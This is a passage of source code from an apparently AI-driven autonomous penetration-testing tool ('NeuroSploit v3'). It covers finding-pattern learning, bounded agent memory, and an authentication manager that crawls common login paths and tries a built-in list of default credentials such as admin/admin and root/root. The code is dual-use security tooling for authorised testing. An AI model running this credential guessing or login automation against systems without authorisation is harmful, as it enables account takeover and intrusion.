}
for key, present in patterns.items():
if present:
indicators.append(key)
return indicators
def _maybe_learn_pattern(self, record: TestRecord, body: str):
"""Learn a new pattern from a test record if it provides new insight."""
from urllib.parse import urlparse
domain = urlparse(record.target_url).netloc
body_excerpt = body[:500]
# Check if we already know this pattern for this domain
known = any(
p.target_domain == domain
and p.pattern_type == record.pattern_type
and p.vuln_type == record.vuln_type
for p in self.custom_patterns
)
if known:
return
# Learn new domain-specific pattern
pattern = ResponsePattern(
pattern_type=record.pattern_type,
indicators=record.key_indicators,
is_false_positive=not record.is_true_positive,
confidence=0.7, # Start with moderate confidence
example_body=body_excerpt,
vuln_type=record.vuln_type,
target_domain=domain,
timestamp=record.timestamp,
)
self.custom_patterns.append(pattern)
def get_patterns_for_target(self, domain: str) -> List[ResponsePattern]:
"""Get learned patterns for a specific target domain."""
return [
p for p in self.custom_patterns
if p.target_domain == domain
]
def get_false_positive_rate(self, vuln_type: str) -> float:
"""Get the false positive rate for a specific vuln type from historical data."""
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if not type_records:
return 0.5 # No data → assume 50%
fp_count = sum(1 for r in type_records if not r.is_true_positive)
return fp_count / len(type_records)
def get_learning_context(self, vuln_type: str, domain: str = "") -> str:
"""Generate learning context for AI prompts.
Returns a formatted string with learned patterns and statistics
that can be injected into LLM prompts to improve access control testing.
"""
parts = []
# Historical stats
type_records = [r for r in self.records if r.vuln_type == vuln_type]
if type_records:
total = len(type_records)
tp = sum(1 for r in type_records if r.is_true_positive)
fp = total - tp
parts.append(
f"Historical {vuln_type} testing: {total} tests, "
f"{tp} true positives ({100*tp/total:.0f}%), "
f"{fp} false positives ({100*fp/total:.0f}%)"
)
# Most common FP patterns
fp_patterns = [r.pattern_type for r in type_records if not r.is_true_positive]
if fp_patterns:
from collections import Counter
common = Counter(fp_patterns).most_common(3)
pattern_str = ", ".join(f"{p} ({c}x)" for p, c in common)
parts.append(f"Common false positive patterns: {pattern_str}")
# Domain-specific patterns
if domain:
domain_patterns = self.get_patterns_for_target(domain)
if domain_patterns:
for p in domain_patterns[:5]:
status = "FALSE POSITIVE" if p.is_false_positive else "TRUE POSITIVE"
parts.append(
f"Known pattern for {domain}: {p.pattern_type} = {status} "
f"(confidence: {p.confidence:.0%})"
)
# Known application FP patterns
if domain:
for app_name, indicators in self.KNOWN_FP_PATTERNS.items():
if any(i in domain.lower() for i in indicators):
parts.append(
f"WARNING: Target appears to use {app_name}"
f"known for producing false positive access control findings"
)
if not parts:
return ""
return "## Learned Access Control Patterns\n" + "\n".join(f"- {p}" for p in parts)
def get_evaluation_hints(self, vuln_type: str, response_body: str, status: int) -> Dict:
"""Get evaluation hints for a specific response.
Returns hints that can help the validation judge or AI make better decisions.
"""
pattern_type = self._classify_response(response_body, status)
indicators = self._extract_key_indicators(response_body)
# Check against default patterns
matching_default = [
p for p in self.DEFAULT_PATTERNS
if any(i.lower() in response_body.lower() for i in p["indicators"] if i)
]
# Check against learned patterns
matching_learned = [
p for p in self.custom_patterns
if p.vuln_type == vuln_type and p.pattern_type == pattern_type
]
fp_signals = sum(
1 for p in matching_default if p["is_false_positive"]
) + sum(
1 for p in matching_learned if p.is_false_positive
)
tp_signals = sum(
1 for p in matching_default if not p["is_false_positive"]
) + sum(
1 for p in matching_learned if not p.is_false_positive
)
return {
"pattern_type": pattern_type,
"indicators": indicators,
"fp_signals": fp_signals,
"tp_signals": tp_signals,
"likely_false_positive": fp_signals > tp_signals,
"matching_patterns": len(matching_default) + len(matching_learned),
}
+401
View File
@@ -0,0 +1,401 @@
"""
NeuroSploit v3 - Agent Memory Management
Bounded, deduplicated memory architecture for the autonomous agent.
Replaces ad-hoc self.findings / self.tested_payloads with structured,
eviction-aware data stores.
Inspired by XBOW benchmark methodology: every finding must have
real HTTP evidence, duplicates are suppressed, baselines are cached.
"""
import hashlib
import re
from dataclasses import dataclass, field, asdict
from datetime import datetime
from typing import Dict, List, Optional, Any, Set
from collections import OrderedDict
from urllib.parse import urlparse
# ---------------------------------------------------------------------------
# Data classes
# ---------------------------------------------------------------------------
@dataclass
class TestedCombination:
"""Record of a (url, param, vuln_type) test attempt"""
url: str
param: str
vuln_type: str
payloads_used: List[str] = field(default_factory=list)
was_vulnerable: bool = False
tested_at: str = ""
def __post_init__(self):
if not self.tested_at:
self.tested_at = datetime.utcnow().isoformat()
@dataclass
class EndpointFingerprint:
"""Fingerprint of an endpoint's normal response"""
url: str
status_code: int = 0
content_type: str = ""
body_length: int = 0
body_hash: str = ""
server_header: str = ""
powered_by: str = ""
error_patterns: List[str] = field(default_factory=list)
tech_headers: Dict[str, str] = field(default_factory=dict)
fingerprinted_at: str = ""
def __post_init__(self):
if not self.fingerprinted_at:
self.fingerprinted_at = datetime.utcnow().isoformat()
@dataclass
class RejectedFinding:
"""Audit trail for rejected findings"""
finding_hash: str
vuln_type: str
endpoint: str
param: str
reason: str
rejected_at: str = ""
def __post_init__(self):
if not self.rejected_at:
self.rejected_at = datetime.utcnow().isoformat()
# ---------------------------------------------------------------------------
# Speculative language patterns (anti-hallucination)
# ---------------------------------------------------------------------------
SPECULATIVE_PATTERNS = re.compile(
r"\b(could be|might be|may be|theoretically|potentially vulnerable|"
r"possibly|appears to be vulnerable|suggests? (a )?vulnerab|"
r"it is possible|in theory|hypothetically)\b",
re.IGNORECASE
)
# ---------------------------------------------------------------------------
# AgentMemory
# ---------------------------------------------------------------------------
class AgentMemory:
"""
Bounded memory store for the autonomous agent.
All containers have hard caps. When a cap is reached, the oldest 25%
of entries are evicted (LRU-style).
"""
# Capacity limits
MAX_TESTED = 10_000
MAX_BASELINES = 500
MAX_FINGERPRINTS = 500
MAX_CONFIRMED = 200
MAX_REJECTED = 500
# Domain-scoped types: only 1 finding per domain (not per URL)
DOMAIN_SCOPED_TYPES = {
# Infrastructure / headers
"security_headers", "clickjacking", "insecure_http_headers",
"missing_xcto", "missing_csp", "missing_hsts",
"missing_referrer_policy", "missing_permissions_policy",
"cors_misconfig", "insecure_cors_policy", "ssl_issues", "weak_tls_config",
"http_methods", "unrestricted_http_methods",
# Server config
"debug_mode", "debug_mode_enabled", "verbose_error_messages",
"directory_listing", "directory_listing_enabled",
"exposed_admin_panel", "exposed_api_docs", "insecure_cookie_flags",
# Data exposure
"cleartext_transmission", "sensitive_data_exposure",
"information_disclosure", "version_disclosure",
"weak_encryption", "weak_hashing", "weak_random",
# Auth config
"missing_mfa", "weak_password_policy", "weak_password",
# Cloud/API
"graphql_introspection", "rest_api_versioning", "api_rate_limiting",
}
def __init__(self):
# Core stores (OrderedDict for eviction order)
self.tested_combinations: OrderedDict[str, TestedCombination] = OrderedDict()
self.baseline_responses: OrderedDict[str, dict] = OrderedDict()
self.endpoint_fingerprints: OrderedDict[str, EndpointFingerprint] = OrderedDict()
# Findings
self.confirmed_findings: List[Any] = [] # List[Finding] - uses agent's Finding dataclass
self._finding_hashes: Set[str] = set() # fast dedup lookup
# Audit trail
self.rejected_findings: List[RejectedFinding] = []
# Technology stack detected across all endpoints
self.technology_stack: Dict[str, str] = {} # e.g. {"server": "Apache", "x-powered-by": "PHP/8.1"}
# ------------------------------------------------------------------
# Tested-combination tracking
# ------------------------------------------------------------------
@staticmethod
def _test_key(url: str, param: str, vuln_type: str) -> str:
"""Deterministic key for a (url, param, vuln_type) tuple"""
return hashlib.sha256(f"{url}|{param}|{vuln_type}".encode()).hexdigest()
def was_tested(self, url: str, param: str, vuln_type: str) -> bool:
"""Check whether this combination was already tested"""
return self._test_key(url, param, vuln_type) in self.tested_combinations
def record_test(
self, url: str, param: str, vuln_type: str,
payloads: List[str], was_vulnerable: bool = False
):
"""Record a completed test"""
key = self._test_key(url, param, vuln_type)
self.tested_combinations[key] = TestedCombination(
url=url, param=param, vuln_type=vuln_type,
payloads_used=payloads[:10], # store up to 10 payloads
was_vulnerable=was_vulnerable,
)
self._enforce_limit(self.tested_combinations, self.MAX_TESTED)
# ------------------------------------------------------------------
# Baseline caching
# ------------------------------------------------------------------
@staticmethod
def _baseline_key(url: str) -> str:
"""Key for baseline storage (strip query params for reuse)"""
from urllib.parse import urlparse
parsed = urlparse(url)
return f"{parsed.scheme}://{parsed.netloc}{parsed.path}"
def store_baseline(self, url: str, response: dict):
"""Cache a baseline (clean) response for a URL"""
key = self._baseline_key(url)
body = response.get("body", "")
self.baseline_responses[key] = {
"status": response.get("status", 0),
"content_type": response.get("content_type", ""),
"body_length": len(body),
"body_hash": hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
"body": body[:5000], # store first 5k chars for comparison
"headers": response.get("headers", {}),
"fetched_at": datetime.utcnow().isoformat(),
}
self._enforce_limit(self.baseline_responses, self.MAX_BASELINES)
def get_baseline(self, url: str) -> Optional[dict]:
"""Retrieve cached baseline for a URL"""
key = self._baseline_key(url)
baseline = self.baseline_responses.get(key)
if baseline:
# Move to end (mark as recently used)
self.baseline_responses.move_to_end(key)
return baseline
# ------------------------------------------------------------------
# Endpoint fingerprinting
# ------------------------------------------------------------------
def store_fingerprint(self, url: str, response: dict):
"""Extract and store endpoint fingerprint from a response"""
key = self._baseline_key(url)
headers = response.get("headers", {})
body = response.get("body", "")
# Detect error patterns in the body
error_patterns = []
error_regexes = [
r"(?:sql|database|query)\s*(?:error|syntax|exception)",
r"(?:warning|fatal|parse)\s*(?:error|exception)",
r"stack\s*trace",
r"traceback\s*\(most recent",
r"<b>(?:Warning|Fatal error|Notice)</b>",
r"Internal Server Error",
]
body_lower = body.lower() if body else ""
for pat in error_regexes:
if re.search(pat, body_lower):
error_patterns.append(pat)
fp = EndpointFingerprint(
url=url,
status_code=response.get("status", 0),
content_type=response.get("content_type", ""),
body_length=len(body),
body_hash=hashlib.md5(body.encode("utf-8", errors="replace")).hexdigest(),
server_header=headers.get("server", headers.get("Server", "")),
powered_by=headers.get("x-powered-by", headers.get("X-Powered-By", "")),
error_patterns=error_patterns,
tech_headers={
k: v for k, v in headers.items()
if k.lower() in (
"server", "x-powered-by", "x-aspnet-version",
"x-generator", "x-drupal-cache", "x-framework",
)
},
)
self.endpoint_fingerprints[key] = fp
self._enforce_limit(self.endpoint_fingerprints, self.MAX_FINGERPRINTS)
# Update global tech stack
if fp.server_header:
self.technology_stack["server"] = fp.server_header
if fp.powered_by:
self.technology_stack["x-powered-by"] = fp.powered_by
for k, v in fp.tech_headers.items():
self.technology_stack[k.lower()] = v
def get_fingerprint(self, url: str) -> Optional[EndpointFingerprint]:
"""Retrieve fingerprint for a URL"""
key = self._baseline_key(url)
return self.endpoint_fingerprints.get(key)
# ------------------------------------------------------------------
# Finding management (dedup + bounded)
# ------------------------------------------------------------------
@staticmethod
def _finding_hash(finding) -> str:
"""Compute dedup hash for a finding.
For domain-scoped types, uses scheme://netloc instead of full URL
so the same missing header isn't reported per-URL.
"""
vuln_type = finding.vulnerability_type
endpoint = finding.affected_endpoint
if vuln_type in AgentMemory.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{finding.parameter}"
return hashlib.sha256(raw.encode()).hexdigest()
def _find_existing(self, finding) -> Optional[Any]:
"""Find an existing confirmed finding with the same dedup hash."""
fh = self._finding_hash(finding)
if fh not in self._finding_hashes:
return None
for f in self.confirmed_findings:
if self._finding_hash(f) == fh:
return f
return None
def add_finding(self, finding) -> bool:
"""
Add a confirmed finding. Returns False if:
- duplicate (same vuln_type + endpoint + param)
- at capacity
- evidence is missing or speculative
For domain-scoped types, duplicates append the URL to
the existing finding's affected_urls list instead.
"""
fh = self._finding_hash(finding)
# Dedup check — for domain-scoped types, merge URLs
if fh in self._finding_hashes:
if finding.vulnerability_type in self.DOMAIN_SCOPED_TYPES:
existing = self._find_existing(finding)
if existing and hasattr(existing, "affected_urls"):
url = finding.affected_endpoint
if url and url not in existing.affected_urls:
existing.affected_urls.append(url)
return False
# Capacity check
if len(self.confirmed_findings) >= self.MAX_CONFIRMED:
return False
# Evidence quality check
if not finding.evidence and not finding.response:
return False
# Speculative language check
if finding.evidence and SPECULATIVE_PATTERNS.search(finding.evidence):
self.reject_finding(finding, "Speculative language in evidence")
return False
self.confirmed_findings.append(finding)
self._finding_hashes.add(fh)
return True
def reject_finding(self, finding, reason: str):
"""Record a rejected finding for audit"""
self.rejected_findings.append(RejectedFinding(
finding_hash=self._finding_hash(finding),
vuln_type=getattr(finding, "vulnerability_type", "unknown"),
endpoint=getattr(finding, "affected_endpoint", ""),
param=getattr(finding, "parameter", ""),
reason=reason,
))
if len(self.rejected_findings) > self.MAX_REJECTED:
# Evict oldest 25%
cut = self.MAX_REJECTED // 4
self.rejected_findings = self.rejected_findings[cut:]
def has_finding_for(self, vuln_type: str, endpoint: str, param: str = "") -> bool:
"""Check if a confirmed finding already exists for this combo.
Uses domain-scoped key for domain-scoped types.
"""
if vuln_type in self.DOMAIN_SCOPED_TYPES:
parsed = urlparse(endpoint)
scope_key = f"{parsed.scheme}://{parsed.netloc}"
else:
scope_key = endpoint
raw = f"{vuln_type}|{scope_key}|{param}"
fh = hashlib.sha256(raw.encode()).hexdigest()
return fh in self._finding_hashes
# ------------------------------------------------------------------
# Eviction helper
# ------------------------------------------------------------------
@staticmethod
def _enforce_limit(od: OrderedDict, limit: int):
"""Evict oldest 25% when limit is exceeded"""
if len(od) <= limit:
return
to_remove = limit // 4
for _ in range(to_remove):
od.popitem(last=False) # pop oldest
# ------------------------------------------------------------------
# Stats / introspection
# ------------------------------------------------------------------
def stats(self) -> dict:
"""Return memory usage statistics"""
return {
"tested_combinations": len(self.tested_combinations),
"baseline_responses": len(self.baseline_responses),
"endpoint_fingerprints": len(self.endpoint_fingerprints),
"confirmed_findings": len(self.confirmed_findings),
"rejected_findings": len(self.rejected_findings),
"technology_stack": dict(self.technology_stack),
"limits": {
"tested": self.MAX_TESTED,
"baselines": self.MAX_BASELINES,
"fingerprints": self.MAX_FINGERPRINTS,
"confirmed": self.MAX_CONFIRMED,
"rejected": self.MAX_REJECTED,
},
}
def clear(self):
"""Reset all memory stores"""
self.tested_combinations.clear()
self.baseline_responses.clear()
self.endpoint_fingerprints.clear()
self.confirmed_findings.clear()
self._finding_hashes.clear()
self.rejected_findings.clear()
self.technology_stack.clear()
+596
View File
@@ -0,0 +1,596 @@
"""
NeuroSploit v3 - Authentication Manager
Autonomous login, session management, multi-user context for
BOLA/BFLA/IDOR testing. Handles login form detection, CSRF extraction,
credential management, and session refresh.
"""
import logging
import re
import time
from dataclasses import dataclass, field
from datetime import datetime
from typing import Callable, Dict, List, Optional, Any
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class Credentials:
"""A set of credentials for testing."""
username: str
password: str
role: str = "user" # user, admin
source: str = "provided" # provided, discovered, default
@dataclass
class SessionContext:
"""Authentication session state."""
name: str # "user_a", "user_b", "admin"
role: str # user, admin
cookies: Dict[str, str] = field(default_factory=dict)
tokens: Dict[str, str] = field(default_factory=dict) # bearer, jwt, api_key
headers: Dict[str, str] = field(default_factory=dict) # Authorization: Bearer xxx
state: str = "unauthenticated" # unauthenticated, authenticating, authenticated, expired
login_time: Optional[float] = None
credential: Optional[Credentials] = None
login_url: Optional[str] = None
session_duration: float = 3600.0 # Estimated session lifetime (1 hour default)
@dataclass
class LoginForm:
"""Detected login form."""
url: str # Form action URL
method: str # POST usually
username_field: str # name attribute of username input
password_field: str # name attribute of password input
csrf_field: Optional[str] = None
csrf_value: Optional[str] = None
extra_fields: Dict[str, str] = field(default_factory=dict)
confidence: float = 0.0
class AuthManager:
"""Autonomous authentication manager.
Manages login automation, session tracking, and multi-user
contexts for access control vulnerability testing.
Features:
- Login form detection from HTML
- CSRF token extraction
- Credential management (provided + discovered)
- Session state machine (unauthenticated -> authenticated -> expired)
- Multi-user contexts for BOLA/BFLA/IDOR testing
- Auto session refresh on expiry detection
- Token extraction from responses (JWT, Bearer, API keys)
"""
# Default credentials to try on admin panels
DEFAULT_CREDENTIALS = [
Credentials("admin", "admin", "admin", "default"),
Credentials("admin", "password", "admin", "default"),
Credentials("admin", "admin123", "admin", "default"),
Credentials("root", "root", "admin", "default"),
Credentials("test", "test", "user", "default"),
Credentials("user", "user", "user", "default"),
Credentials("admin", "Password1", "admin", "default"),
Credentials("administrator", "administrator", "admin", "default"),
]
# Session expiry indicators
EXPIRY_INDICATORS = [
"session expired", "session timeout", "please log in",
"please login", "sign in again", "token expired",
"unauthorized", "authentication required", "not authenticated",
"jwt expired", "invalid token", "access token expired",
]
# Login success indicators
SUCCESS_INDICATORS = [
"welcome", "dashboard", "my account", "profile",
"logged in", "sign out", "logout", "log out",
"home", "settings", "preferences",
]
# Login failure indicators
FAILURE_INDICATORS = [
"invalid", "incorrect", "wrong", "failed", "error",
"denied", "bad credentials", "authentication failed",
"login failed", "invalid username", "invalid password",
]
def __init__(self, request_engine=None, recon=None):
self.request_engine = request_engine
self.recon = recon
# Credential store
self._credentials: Dict[str, List[Credentials]] = {
"user": [],
"admin": [],
}
# Session contexts
self.contexts: Dict[str, SessionContext] = {
"user_a": SessionContext(name="user_a", role="user"),
"user_b": SessionContext(name="user_b", role="user"),
"admin": SessionContext(name="admin", role="admin"),
}
# Discovered login forms
self._login_forms: List[LoginForm] = []
self._login_attempts = 0
self._successful_logins = 0
# --- Credential Management -------------------------------------------
def add_credentials(self, username: str, password: str, role: str = "user", source: str = "provided"):
"""Add credentials for testing."""
cred = Credentials(username, password, role, source)
self._credentials.setdefault(role, []).append(cred)
logger.debug(f"Added {role} credentials: {username} (source: {source})")
def add_discovered_credentials(self, creds_list: List[Dict]):
"""Add credentials discovered during testing (from info disclosure, etc.)."""
for cred_info in creds_list:
username = cred_info.get("username", "")
password = cred_info.get("password", "")
if username and password:
self.add_credentials(username, password, role="user", source="discovered")
def get_credentials_for_role(self, role: str) -> List[Credentials]:
"""Get all credentials for a role."""
creds = self._credentials.get(role, [])
if not creds and role == "admin":
return self.DEFAULT_CREDENTIALS[:4] # Only admin defaults
if not creds and role == "user":
return self.DEFAULT_CREDENTIALS[4:6] # Only user defaults
return creds
# --- Login Form Detection --------------------------------------------
def detect_login_forms(self, html: str, page_url: str) -> List[LoginForm]:
"""Detect login forms in HTML content."""
forms = []
# Find all <form> tags
form_pattern = re.compile(
r'<form[^>]*>(.*?)</form>',
re.DOTALL | re.IGNORECASE
)
for form_match in form_pattern.finditer(html):
form_html = form_match.group(0)
form_inner = form_match.group(1)
# Check if this looks like a login form
has_password = bool(re.search(r'type=["\']password["\']', form_inner, re.I))
if not has_password:
continue
# Extract form action
action_match = re.search(r'action=["\']([^"\']*)["\']', form_html, re.I)
action = action_match.group(1) if action_match else page_url
if not action.startswith("http"):
action = urljoin(page_url, action)
# Extract method
method_match = re.search(r'method=["\']([^"\']*)["\']', form_html, re.I)
method = (method_match.group(1) if method_match else "POST").upper()
# Find username field
username_field = self._find_username_field(form_inner)
# Find password field
password_field = self._find_field_name(form_inner, r'type=["\']password["\']')
# Find CSRF token
csrf_field, csrf_value = self._find_csrf_token(form_inner)
# Find hidden fields
extra_fields = self._find_hidden_fields(form_inner)
if csrf_field and csrf_field in extra_fields:
del extra_fields[csrf_field]
# Calculate confidence
confidence = 0.5 # Has password field
login_keywords = ["login", "signin", "sign-in", "auth", "log-in", "session"]
if any(kw in action.lower() for kw in login_keywords):
confidence += 0.3
if any(kw in form_html.lower() for kw in login_keywords):
confidence += 0.2
if username_field and password_field:
forms.append(LoginForm(
url=action,
method=method,
username_field=username_field,
password_field=password_field,
csrf_field=csrf_field,
csrf_value=csrf_value,
extra_fields=extra_fields,
confidence=min(1.0, confidence),
))
# Sort by confidence
forms.sort(key=lambda f: f.confidence, reverse=True)
self._login_forms.extend(forms)
return forms
def _find_username_field(self, html: str) -> Optional[str]:
"""Find the username/email input field name."""
# Priority: explicit username/email fields
patterns = [
r'name=["\']([^"\']*(?:user|login|email|account)[^"\']*)["\']',
r'name=["\']([^"\']*)["\'].*?type=["\'](?:text|email)["\']',
r'type=["\'](?:text|email)["\'].*?name=["\']([^"\']*)["\']',
]
for pattern in patterns:
match = re.search(pattern, html, re.I)
if match:
return match.group(1)
return None
def _find_field_name(self, html: str, type_pattern: str) -> Optional[str]:
"""Find field name for a given input type pattern."""
# Try: name="x" ... type="password"
match = re.search(
r'name=["\']([^"\']+)["\'][^>]*' + type_pattern,
html, re.I
)
if match:
return match.group(1)
# Try: type="password" ... name="x"
match = re.search(
type_pattern + r'[^>]*name=["\']([^"\']+)["\']',
html, re.I
)
if match:
return match.group(1)
return None
def _find_csrf_token(self, html: str):
"""Find CSRF token in form."""
csrf_patterns = [
r'name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken|__RequestVerificationToken|authenticity_token|_csrf_token)[^"\']*)["\'][^>]*value=["\']([^"\']*)["\']',
r'value=["\']([^"\']*)["\'][^>]*name=["\']([^"\']*(?:csrf|_token|csrfmiddlewaretoken)[^"\']*)["\']',
]
for pattern in csrf_patterns:
match = re.search(pattern, html, re.I)
if match:
groups = match.groups()
if "csrf" in groups[0].lower() or "_token" in groups[0].lower():
return groups[0], groups[1]
return groups[1], groups[0]
return None, None
def _find_hidden_fields(self, html: str) -> Dict[str, str]:
"""Extract all hidden field name-value pairs."""
fields = {}
pattern = re.compile(
r'type=["\']hidden["\'][^>]*name=["\']([^"\']+)["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern.finditer(html):
fields[match.group(1)] = match.group(2)
# Also try reverse order (name before type)
pattern2 = re.compile(
r'name=["\']([^"\']+)["\'][^>]*type=["\']hidden["\'][^>]*value=["\']([^"\']*)["\']',
re.I
)
for match in pattern2.finditer(html):
fields[match.group(1)] = match.group(2)
return fields
# --- Authentication --------------------------------------------------
async def authenticate(self, context_name: str = "user_a") -> bool:
"""Attempt to authenticate a session context.
Tries login forms with available credentials.
Returns True if authentication succeeded.
"""
if not self.request_engine:
return False
ctx = self.contexts.get(context_name)
if not ctx:
return False
ctx.state = "authenticating"
creds = self.get_credentials_for_role(ctx.role)
if not creds:
logger.debug(f"No credentials available for {context_name} ({ctx.role})")
ctx.state = "unauthenticated"
return False
# Find login forms if not already discovered
if not self._login_forms:
await self._discover_login_forms()
if not self._login_forms:
logger.debug("No login forms found")
ctx.state = "unauthenticated"
return False
# Try each form with each credential
for form in self._login_forms:
for cred in creds:
self._login_attempts += 1
success = await self._attempt_login(form, cred, ctx)
if success:
ctx.state = "authenticated"
ctx.credential = cred
ctx.login_time = time.time()
ctx.login_url = form.url
self._successful_logins += 1
logger.info(f"Login success: {context_name} as {cred.username} ({cred.role})")
return True
ctx.state = "unauthenticated"
return False
async def _discover_login_forms(self):
"""Discover login forms by crawling common login paths."""
if not self.request_engine:
return
# Use recon data if available
target = ""
if self.recon and hasattr(self.recon, "target"):
target = self.recon.target
if not target:
return
login_paths = [
"/login", "/signin", "/sign-in", "/auth/login",
"/user/login", "/admin/login", "/api/auth/login",
"/account/login", "/wp-login.php", "/admin",
]
parsed = urlparse(target)
base = f"{parsed.scheme}://{parsed.netloc}"
for path in login_paths:
try:
url = f"{base}{path}"
result = await self.request_engine.request(url, method="GET")
if result and result.status == 200 and result.body:
forms = self.detect_login_forms(result.body, url)
if forms:
logger.debug(f"Found {len(forms)} login form(s) at {url}")
return # Found forms, stop searching
except Exception:
continue
async def _attempt_login(self, form: LoginForm, cred: Credentials, ctx: SessionContext) -> bool:
"""Attempt login with a specific form and credential."""
try:
# Build form data
data = {}
# Add hidden fields first
data.update(form.extra_fields)
# Refresh CSRF token if needed
if form.csrf_field:
fresh_csrf = await self._refresh_csrf(form)
if fresh_csrf:
data[form.csrf_field] = fresh_csrf
elif form.csrf_value:
data[form.csrf_field] = form.csrf_value
# Add credentials
data[form.username_field] = cred.username
data[form.password_field] = cred.password
# Submit form
result = await self.request_engine.request(
form.url,
method=form.method,
data=data,
allow_redirects=True,
)
if not result:
return False
# Check for login success
success = self._detect_login_success(
result.body, result.status, result.headers
)
if success:
# Extract tokens and cookies
self._extract_session_data(result, ctx)
return True
return False
except Exception as e:
logger.debug(f"Login attempt failed: {e}")
return False
async def _refresh_csrf(self, form: LoginForm) -> Optional[str]:
"""Fetch fresh CSRF token from the login page."""
try:
# GET the form page to get a fresh token
page_url = form.url.replace(urlparse(form.url).path, "") + urlparse(form.url).path
result = await self.request_engine.request(page_url, method="GET")
if result and result.body:
_, csrf_value = self._find_csrf_token(result.body)
return csrf_value
except Exception:
pass
return None
def _detect_login_success(self, body: str, status: int, headers: Dict) -> bool:
"""Detect if login was successful."""
body_lower = (body or "").lower()
# Check for redirect to authenticated area
if status in (301, 302, 303, 307):
location = headers.get("Location", headers.get("location", ""))
if any(kw in location.lower() for kw in ["dashboard", "home", "profile", "admin"]):
return True
# Check for Set-Cookie (session creation)
has_session_cookie = any(
"set-cookie" in k.lower() for k in headers
)
# Check for success indicators in body
success_count = sum(1 for kw in self.SUCCESS_INDICATORS if kw in body_lower)
failure_count = sum(1 for kw in self.FAILURE_INDICATORS if kw in body_lower)
# Success if: session cookie + success indicators and no failure indicators
if has_session_cookie and success_count > 0 and failure_count == 0:
return True
# Success if: 200 OK + strong success indicators + no failure
if status == 200 and success_count >= 2 and failure_count == 0:
return True
return False
def _extract_session_data(self, result, ctx: SessionContext):
"""Extract tokens and cookies from a successful login response."""
# Extract cookies from Set-Cookie headers
for key, value in result.headers.items():
if key.lower() == "set-cookie":
cookie_parts = value.split(";")[0].split("=", 1)
if len(cookie_parts) == 2:
ctx.cookies[cookie_parts[0].strip()] = cookie_parts[1].strip()
# Extract tokens from response body (JSON)
body = result.body or ""
token_patterns = [
(r'"(?:access_token|token|jwt|bearer|id_token)"\s*:\s*"([^"]+)"', "bearer"),
(r'"(?:api_key|apikey|api-key)"\s*:\s*"([^"]+)"', "api_key"),
(r'"(?:refresh_token)"\s*:\s*"([^"]+)"', "refresh"),
]
for pattern, token_type in token_patterns:
match = re.search(pattern, body, re.I)
if match:
ctx.tokens[token_type] = match.group(1)
# Build auth headers
if "bearer" in ctx.tokens:
ctx.headers["Authorization"] = f"Bearer {ctx.tokens['bearer']}"
elif "api_key" in ctx.tokens:
ctx.headers["X-API-Key"] = ctx.tokens["api_key"]
# --- Session Management ----------------------------------------------
def detect_session_expiry(self, body: str, status: int) -> bool:
"""Check if a response indicates session expiry."""
if status in (401, 403):
return True
body_lower = (body or "").lower()
return any(kw in body_lower for kw in self.EXPIRY_INDICATORS)
async def refresh(self, context_name: Optional[str] = None) -> bool:
"""Refresh an expired session by re-authenticating.
If context_name is None, refresh all expired sessions.
"""
contexts_to_refresh = []
if context_name:
ctx = self.contexts.get(context_name)
if ctx and ctx.state == "expired":
contexts_to_refresh.append(context_name)
else:
for name, ctx in self.contexts.items():
if ctx.state == "expired":
contexts_to_refresh.append(name)
results = []
for name in contexts_to_refresh:
ctx = self.contexts[name]
ctx.state = "unauthenticated"
ctx.cookies.clear()
ctx.tokens.clear()
ctx.headers.clear()
success = await self.authenticate(name)
results.append(success)
return all(results) if results else False
def check_and_mark_expiry(self, context_name: str, body: str, status: int) -> bool:
"""Check response for expiry and mark context if expired.
Returns True if session was detected as expired.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return False
if self.detect_session_expiry(body, status):
ctx.state = "expired"
logger.info(f"Session expired for {context_name}")
return True
# Check time-based expiry
if ctx.login_time and (time.time() - ctx.login_time) > ctx.session_duration:
ctx.state = "expired"
logger.info(f"Session timeout for {context_name}")
return True
return False
# --- Request Integration ---------------------------------------------
def get_context(self, context_name: str) -> Optional[SessionContext]:
"""Get a session context by name."""
return self.contexts.get(context_name)
def get_request_kwargs(self, context_name: str) -> Dict:
"""Get headers and cookies for requests as a context.
Returns dict with 'headers' and 'cookies' ready for request_engine.
"""
ctx = self.contexts.get(context_name)
if not ctx or ctx.state != "authenticated":
return {"headers": {}, "cookies": {}}
return {
"headers": dict(ctx.headers),
"cookies": dict(ctx.cookies),
}
def is_authenticated(self, context_name: str) -> bool:
"""Check if a context is currently authenticated."""
ctx = self.contexts.get(context_name)
return ctx is not None and ctx.state == "authenticated"
def get_auth_summary(self) -> Dict:
"""Get summary of authentication state for reporting."""
return {
"contexts": {
name: {
"state": ctx.state,
"role": ctx.role,
"credential": ctx.credential.username if ctx.credential else None,
"has_tokens": bool(ctx.tokens),
"has_cookies": bool(ctx.cookies),
}
for name, ctx in self.contexts.items()
},
"login_forms_found": len(self._login_forms),
"login_attempts": self._login_attempts,
"successful_logins": self._successful_logins,
"credentials_available": {
role: len(creds)
for role, creds in self._credentials.items()
},
}
File diff suppressed because it is too large Load Diff
+629
View File
@@ -0,0 +1,629 @@
"""
NeuroSploit v3 - Exploit Chain Engine
Finding correlation, derived target generation, and attack graph
construction for autonomous pentesting. When a vulnerability is
confirmed, this engine generates follow-up targets based on 10
chain rules.
"""
import logging
import re
from dataclasses import dataclass, field
from typing import Any, Callable, Dict, List, Optional
from urllib.parse import urlparse, urljoin
logger = logging.getLogger(__name__)
@dataclass
class ChainableTarget:
"""A derived attack target generated from a confirmed finding."""
url: str
param: str
vuln_type: str
context: Dict[str, Any] = field(default_factory=dict)
chain_depth: int = 1
parent_finding_id: str = ""
priority: int = 2 # 1=critical, 2=high, 3=medium
method: str = "GET"
injection_point: str = "parameter"
payload_hint: Optional[str] = None
description: str = ""
@dataclass
class ChainRule:
"""Defines how a finding triggers derived targets."""
trigger_type: str # Vuln type that triggers this rule
derived_types: List[str] # Types to test on derived targets
extraction_fn: str # Method name for target extraction
priority: int = 2
max_depth: int = 3
description: str = ""
# 10 chain rules
CHAIN_RULES: List[ChainRule] = [
ChainRule(
trigger_type="ssrf",
